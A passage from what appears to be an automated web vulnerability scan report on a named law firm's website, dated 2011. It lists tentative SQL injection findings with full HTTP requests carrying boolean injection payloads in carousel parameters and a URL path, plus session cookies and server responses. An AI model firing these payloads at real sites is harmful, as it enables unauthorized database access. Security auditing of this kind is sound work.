Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.47. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_directory parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_directory parameter appears to be vulnerable to SQL injection attacks. The payloads 12403700'%20or%201%3d1--%20 and 12403700'%20or%201%3d2--%20 were each submitted in the slide_directory parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides12403700'%20or%201%3d1--%20&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides12403700'%20or%201%3d2--%20&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.48. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_links parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_links parameter appears to be vulnerable to SQL injection attacks. The payloads 79799331'%20or%201%3d1--%20 and 79799331'%20or%201%3d2--%20 were each submitted in the slide_links parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no79799331'%20or%201%3d1--%20&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no79799331'%20or%201%3d2--%20&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.49. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_number_display parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_number_display parameter appears to be vulnerable to SQL injection attacks. The payloads 16437454'%20or%201%3d1--%20 and 16437454'%20or%201%3d2--%20 were each submitted in the slide_number_display parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no16437454'%20or%201%3d1--%20&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no16437454'%20or%201%3d2--%20&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.50. http://www.curtis.com/scripts/carousel/getimages.cfm [water_mark parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The water_mark parameter appears to be vulnerable to SQL injection attacks. The payloads 19764299'%20or%201%3d1--%20 and 19764299'%20or%201%3d2--%20 were each submitted in the water_mark parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no19764299'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no19764299'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.51. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15403378'%20or%201%3d1--%20 and 15403378'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr315403378'%20or%201%3d1--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr315403378'%20or%201%3d2--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
